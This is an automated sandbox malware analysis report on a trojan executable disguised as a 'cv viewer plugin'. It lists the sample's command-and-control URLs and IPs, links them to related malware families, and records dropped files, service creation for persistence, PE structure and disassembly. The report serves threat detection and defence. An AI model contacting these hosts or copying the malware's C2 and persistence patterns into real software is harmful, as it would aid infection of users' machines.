          http://dddlhyt.info/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92true
          • Avira URL Cloud: safe
          unknown
          http://31.214.157.226/randfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://dddlhyt.info/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68true
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://185.196.8.214/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1cv viewer plugin 8.31.40.exe, 00000007.00000002.2644409140.0000000000B89000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.196.8.214/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834cv viewer plugin 8.31.40.exe, 00000007.00000002.2648250801.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, cv viewer plugin 8.31.40.exe, 00000007.00000002.2648534705.0000000002396000.00000004.00000020.00020000.00000000.sdmp, cv viewer plugin 8.31.40.exe, 00000007.00000002.2648485900.000000000228A000.00000004.00000020.00020000.00000000.sdmp, cv viewer plugin 8.31.40.exe, 00000007.00000002.2644409140.0000000000B9C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          31.214.157.226
          unknownGermany
          58329RACKPLACEDEfalse
          185.196.8.214
          dddlhyt.infoSwitzerland
          34888SIMPLECARRER2ITtrue
          89.105.201.183
          unknownNetherlands
          24875NOVOSERVE-ASNLfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1502272
          Start date and time:2024-08-31 22:11:28 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 58s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run as Windows Service
          Number of analysed new started processes analysed:12
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:cv viewer plugin 8.31.40.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@9/6@1/3
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 83%
          • Number of executed functions: 50
          • Number of non-executed functions: 77
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
          • Excluded IPs from analysis (whitelisted): 20.190.155.16, 20.190.155.130, 20.190.155.132, 40.126.27.66, 20.190.155.66, 20.190.155.3, 20.190.155.1, 20.190.155.2
          • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, settings-win.data.microsoft.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtDeviceIoControlFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          TimeTypeDescription
          16:13:01API Interceptor465794x Sleep call for process: cv viewer plugin 8.31.40.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          185.196.8.214kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
            install.exeGet hashmaliciousSocks5SystemzBrowse
              install.exeGet hashmaliciousSocks5SystemzBrowse
                file.exeGet hashmaliciousSocks5SystemzBrowse
                  file.exeGet hashmaliciousSocks5SystemzBrowse
                    file.exeGet hashmaliciousSocks5SystemzBrowse
                      crt.exeGet hashmaliciousSocks5SystemzBrowse
                        file.exeGet hashmaliciousSocks5SystemzBrowse
                          file.exeGet hashmaliciousSocks5SystemzBrowse
                            file.exeGet hashmaliciousSocks5SystemzBrowse
                              89.105.201.183kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
                                crt.exeGet hashmaliciousSocks5SystemzBrowse
                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                    file.exeGet hashmaliciousSocks5SystemzBrowse
                                      file.exeGet hashmaliciousSocks5SystemzBrowse
                                        file.exeGet hashmaliciousSocks5SystemzBrowse
                                          crt.exeGet hashmaliciousSocks5SystemzBrowse
                                            file.exeGet hashmaliciousSocks5SystemzBrowse
                                              file.exeGet hashmaliciousSocks5SystemzBrowse
                                                5P2QMHky6w.exeGet hashmaliciousSocks5SystemzBrowse
                                                  No context
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  SIMPLECARRER2ITkqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
                                                  • 185.196.8.214
                                                  3plugin29563.exeGet hashmaliciousAmadeyBrowse
                                                  • 185.208.158.116
                                                  install.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 185.196.8.214
                                                  install.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 185.196.8.214
                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 185.196.8.214
                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 185.196.8.214
                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 185.196.8.214
                                                  crt.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 185.196.8.214
                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 185.196.8.214
                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 185.196.8.214
                                                  RACKPLACEDEREMITTANCE-NOTICE-For-Norriselectricxslx.pdfGet hashmaliciousUnknownBrowse
                                                  • 31.214.157.73
                                                  ELECTRONIC RECEIPT_Servier.htmlGet hashmaliciousUnknownBrowse
                                                  • 31.214.157.167
                                                  http://0nlinenfidiesnsdiffu9ehwsxmcmv1kgpeiwush0rfvtdgs2.omega-wls.comGet hashmaliciousUnknownBrowse
                                                  • 31.214.157.167
                                                  ELECTRONIC RECEIPT_Pvtgroup.htmlGet hashmaliciousUnknownBrowse
                                                  • 31.214.157.167
                                                  3WfBfFhuhG.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 31.214.157.103
                                                  pjczQr2H3P.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 31.214.157.103
                                                  9TSh73ulR1.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 31.214.157.103
                                                  pFc3236XqK.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 31.214.157.103
                                                  ScannedXfileX2.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                  • 31.214.157.14
                                                  http://0nlinemmbiyeywhsskd0gotuhqhssbcvposgsai0dsolflktue2.tryuimbghiop.online/Get hashmaliciousUnknownBrowse
                                                  • 31.214.157.153
                                                  NOVOSERVE-ASNLkqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
                                                  • 89.105.201.183
                                                  crt.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 89.105.201.183
                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 89.105.201.183
                                                  file.exeGet hashmaliciousCryptbot, NeoreklamiBrowse
                                                  • 89.105.201.137
                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 89.105.201.183
                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 89.105.201.183
                                                  file.exeGet hashmaliciousCryptbot, NeoreklamiBrowse
                                                  • 89.105.201.137
                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 89.105.201.183
                                                  crt.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 89.105.201.183
                                                  SecuriteInfo.com.Win32.DropperX-gen.709.18225.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                  • 89.105.201.98
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  File Type:ISO-8859 text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):8
                                                  Entropy (8bit):2.0
                                                  Encrypted:false
                                                  SSDEEP:3:c//:c
                                                  MD5:F84A06498A70209A6C736AB086FFA513
                                                  SHA1:26EC0C40980B13E832DB13429D15F79F48B4B958
                                                  SHA-256:619DEF8CBB56C4E3FAE72DB566137D6E239E4AB2A5AE1D44A77965EEB45D4693
                                                  SHA-512:6D74FB1666A32D1398FC0A25D649983240022FA39EF1EDA11F87B4BA2E467EF73384E2C15BFBBA74573E0DFACB11EE3687DE182B0A89C1A99CFD5842EF23F279
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:gy.f....
                                                  Process:C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4
                                                  Entropy (8bit):0.8112781244591328
                                                  Encrypted:false
                                                  SSDEEP:3:1:1
                                                  MD5:D774D7687F27B3B0E50F31DE114CA692
                                                  SHA1:411123537966893E013BD2739B18334D7C05FF78
                                                  SHA-256:A962C99AE0666415E78EFB96BAB1039F404ABE9F9BE88E317EE7E4C473DFAA32
                                                  SHA-512:311DF29A658012744DEA7326F27DF6C1DEE2E8AFCD75B79FE8C0DAA57D6455CA4A6D74E39B709F4700561AFFCE45838114234E4E5CEB545F25FA58C7C749391D
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:Z...
                                                  Process:C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):128
                                                  Entropy (8bit):2.9545817380615236
                                                  Encrypted:false
                                                  SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                  MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                  SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                  SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                  SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                  Process:C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):128
                                                  Entropy (8bit):1.2701231977328944
                                                  Encrypted:false
                                                  SSDEEP:3:WAmJuXDz8/:HHzc
                                                  MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                  SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                  SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                  SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                  Malicious:false
                                                  Preview:ccddf9e705966c2f471db9..........................................................................................................
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):28
                                                  Entropy (8bit):3.678439190827718
                                                  Encrypted:false
                                                  SSDEEP:3:4A4AnXjzSv:4HAnXjg
                                                  MD5:A8F4D690C5BDE96AD275C7D4ABE0E3D3
                                                  SHA1:7C62C96EFD2CA4F3C3EBF0B24C9B5B4C04A4570A
                                                  SHA-256:596CCC911C1772735AAC6A6B756A76D3D55BCECD006B980CF147090B2243FA7B
                                                  SHA-512:A875EBE3C5CDF222FF9D08576F4D996AF827A1C86B3E758CE23F6B33530D512A82CE8E39E519837512080C6212A0A19B3385809BE5F5001C4E488DD79550B852
                                                  Malicious:true
                                                  Preview:[SC] CreateService SUCCESS..
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):419
                                                  Entropy (8bit):3.4821271713974618
                                                  Encrypted:false
                                                  SSDEEP:6:lg3D/8FTgVKBRjGxVVLvH2s/u8qLLFmLaZnsHgm66//Vh//mhSefq:lgAtgV0qVbH2suZLQqOVxmQcq
                                                  MD5:B23B19CB233C16B9E6A0857CCE1861C4
                                                  SHA1:D4690AE2D553E34BA2D95976496B3A4211D5954E
                                                  SHA-256:EE6B4921713CA920A9332E757CE1C0440DE289DF75E53CB04E114690311C9AEC
                                                  SHA-512:C46CA5EF85C36E62CFAAADDC5165A9846F40A5734BA73D9F3D6A0CE56FE9756992B3472D54333B7FC983CDDA72C724711B973A30983142079FC679CA29B0DA35
                                                  Malicious:false
                                                  Preview:..SERVICE_NAME: zuYSo .. TYPE : 10 WIN32_OWN_PROCESS .. STATE : 2 START_PENDING .. (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN).. WIN32_EXIT_CODE : 0 (0x0).. SERVICE_EXIT_CODE : 0 (0x0).. CHECKPOINT : 0x0.. WAIT_HINT : 0x0.. PID : 7320.. FLAGS : ..
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):5.948163421555704
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • VXD Driver (31/22) 0.00%
                                                  File name:cv viewer plugin 8.31.40.exe
                                                  File size:3'665'662 bytes
                                                  MD5:cc497003e60667b5e3a13548ebb571fe
                                                  SHA1:91263b59d8f4929a39af589b6890ce8823c4244f
                                                  SHA256:f74ef29e192d79c8abaf8ba74fb4730895604ef65fd0ad5b3dc6feb98ed6642c
                                                  SHA512:2041f0fac8ef7e9a4d022d3ce9cdc1aa7707627a2d95d262838be0b901d020b76aa30d369b9961d88b7e00d190026af202ee4468dd543ade8be2131220e06a12
                                                  SSDEEP:49152:l22Lbqit7tcTsaeXv7xddrK1GLJITNH47b4HkEDTs/VotrUq:ll37tcIr/7V2EYNH4/4HkEDTs/qf
                                                  TLSH:5C067D913A34E1CBD6461A72A453FE01BDEF4FB8C31C8483A978B9AE6D72CC2055D51E
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."!M_..........................................@.......................... 8............................................
                                                  Icon Hash:000a1e13931b1303
                                                  Entrypoint:0x4bafd0
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:
                                                  Time Stamp:0x5F4D2122 [Mon Aug 31 16:11:14 2020 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:1
                                                  File Version Major:4
                                                  File Version Minor:1
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:1
                                                  Import Hash:654b9d0ee6da3bb0f240ec85887e6544
                                                  Instruction
                                                  push ebp
                                                  mov ebp, esp
                                                  push FFFFFFFFh
                                                  push 004C13A8h
                                                  push 004BAEF8h
                                                  mov eax, dword ptr fs:[00000000h]
                                                  push eax
                                                  mov dword ptr fs:[00000000h], esp
                                                  sub esp, 58h
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  mov dword ptr [ebp-18h], esp
                                                  call dword ptr [004C11DCh]
                                                  xor edx, edx
                                                  mov dl, ah
                                                  mov dword ptr [004C7DA0h], edx
                                                  mov ecx, eax
                                                  and ecx, 000000FFh
                                                  mov dword ptr [004C7D9Ch], ecx
                                                  shl ecx, 08h
                                                  add ecx, edx
                                                  mov dword ptr [004C7D98h], ecx
                                                  shr eax, 10h
                                                  mov dword ptr [004C7D94h], eax
                                                  push 00000001h
                                                  call 00007F1F6490725Eh
                                                  pop ecx
                                                  test eax, eax
                                                  jne 00007F1F649061AAh
                                                  push 0000001Ch
                                                  call 00007F1F64906268h
                                                  pop ecx
                                                  call 00007F1F64907009h
                                                  test eax, eax
                                                  jne 00007F1F649061AAh
                                                  push 00000010h
                                                  call 00007F1F64906257h
                                                  pop ecx
                                                  xor esi, esi
                                                  mov dword ptr [ebp-04h], esi
                                                  call 00007F1F64906E37h
                                                  call dword ptr [004C1110h]
                                                  mov dword ptr [004C8454h], eax
                                                  call 00007F1F64906CF5h
                                                  mov dword ptr [004C7D84h], eax
                                                  call 00007F1F64906A9Eh
                                                  call 00007F1F649069E0h
                                                  call 00007F1F649066EBh
                                                  mov dword ptr [ebp-30h], esi
                                                  lea eax, dword ptr [ebp-5Ch]
                                                  push eax
                                                  call dword ptr [004C10B0h]
                                                  call 00007F1F64906971h
                                                  mov dword ptr [ebp-64h], eax
                                                  test byte ptr [ebp-30h], 00000001h
                                                  je 00007F1F649061A8h
                                                  movzx eax, word ptr [ebp+00h]
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc19640xa0.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc90000x190818.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0xc10000x38c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000xbf47a0xc0000ca346667861df6b2b8a01aa27d61c608False0.8233019510904948data7.682929718305509IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0xc10000x1cc00x2000a1f770ee0270e91c25cd44b10e9a2badFalse0.3876953125data5.34936432257881IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0xc30000x54570x3000c962bf27b956ddb95980c5e184d723a2False0.13248697916666666data1.4380877675781472IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0xc90000x1910000x191000640ee51cbbcaf9d34ea6376b456b4f8bFalse0.25674643956514964data4.384958485811935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .vhead90x25a0000x1280000x127efefe46afa6b359a8bd295e62a2d0d6effeFalse0.6063037986797101data6.122762154415233IMAGE_SCN_TYPE_DSECT, IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_128BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_BITMAP0xca5f00x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                  RT_BITMAP0xca7d80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                  RT_BITMAP0xca9a80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                  RT_BITMAP0xcab780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                  RT_BITMAP0xcad480x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                  RT_BITMAP0xcaf180x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                  RT_BITMAP0xcb0e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                  RT_BITMAP0xcb2b80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                  RT_BITMAP0xcb4880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                  RT_BITMAP0xcb6580xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5208333333333334
                                                  RT_BITMAP0xcb7180xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42857142857142855
                                                  RT_BITMAP0xcb7f80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.4955357142857143
                                                  RT_BITMAP0xcb8d80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.38392857142857145
                                                  RT_BITMAP0xcb9b80xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4947916666666667
                                                  RT_BITMAP0xcba780xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.484375
                                                  RT_BITMAP0xcbb380xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42410714285714285
                                                  RT_BITMAP0xcbc180x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/mEnglishUnited States0.14975247524752475
                                                  RT_BITMAP0xcbf400xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5104166666666666
                                                  RT_BITMAP0xcc0000xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.5
                                                  RT_BITMAP0xcc0e00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                  RT_BITMAP0xcc1c80x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/mEnglishUnited States0.12995049504950495
                                                  RT_BITMAP0xcc4f00xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4895833333333333
                                                  RT_BITMAP0xcc5b00x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/mEnglishUnited States0.12128712871287128
                                                  RT_BITMAP0xcc8d80x230Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/mEnglishUnited States0.5678571428571428
                                                  RT_BITMAP0xccb080x230Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/mEnglishUnited States0.5928571428571429
                                                  RT_BITMAP0xccd380x230Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/mEnglishUnited States0.5392857142857143
                                                  RT_BITMAP0xccf680x230Device independent bitmap graphic, 13 x 13 x 24, image size 520EnglishUnited States0.29285714285714287
                                                  RT_BITMAP0xcd1980x230Device independent bitmap graphic, 13 x 13 x 24, image size 520EnglishUnited States0.2732142857142857
                                                  RT_BITMAP0xcd3c80x230Device independent bitmap graphic, 13 x 13 x 24, image size 520EnglishUnited States0.2714285714285714
                                                  RT_BITMAP0xcd5f80x230Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/mEnglishUnited States0.44642857142857145
                                                  RT_BITMAP0xcd8280x230Device independent bitmap graphic, 13 x 13 x 24, image size 520, resolution 3779 x 3779 px/mEnglishUnited States0.4589285714285714
                                                  RT_ICON0x1fe5080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.18506224066390042
                                                  RT_ICON0xcda580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.09274813675618124
                                                  RT_ICON0xde2800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.15948275862068967
                                                  RT_ICON0xe24a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.20269709543568465
                                                  RT_ICON0xe4a500x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.18856703257685595
                                                  RT_ICON0x126a780x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.41487985212569317
                                                  RT_ICON0x12bf000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.18439716312056736
                                                  RT_ICON0x12c3680xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3200EnglishUnited States0.10771604938271605
                                                  RT_ICON0x12d0100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.12101313320825516
                                                  RT_ICON0x12e0b80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.11951219512195121
                                                  RT_ICON0x12e7200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.21162046908315565
                                                  RT_ICON0x12f5c80x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 7296EnglishUnited States0.0697928026172301
                                                  RT_ICON0x1312700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.07510373443983402
                                                  RT_ICON0x1338180xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2560EnglishUnited States0.08821321321321321
                                                  RT_ICON0x1342800x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4608EnglishUnited States0.15179830747531736
                                                  RT_ICON0x1358a80x3228Device independent bitmap graphic, 64 x 128 x 24, image size 12800EnglishUnited States0.0515576323987539
                                                  RT_ICON0x138ad00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.05107463391591875
                                                  RT_ICON0x13ccf80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.008147994794747426
                                                  RT_ICON0x14d5200x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.38679840235442503
                                                  RT_ICON0x1569c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.32563882645214715
                                                  RT_ICON0x1671f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.27696998123827393
                                                  RT_ICON0x1682980x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.35778688524590163
                                                  RT_ICON0x168c200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.12588652482269502
                                                  RT_ICON0x1690880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.5035460992907801
                                                  RT_ICON0x1694f00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.5389784946236559
                                                  RT_ICON0x1697d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5844594594594594
                                                  RT_ICON0x1699000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6351279317697228
                                                  RT_ICON0x16a7a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7558664259927798
                                                  RT_ICON0x16b0500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.699468085106383
                                                  RT_ICON0x16b4b80xeba5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0001989225031083
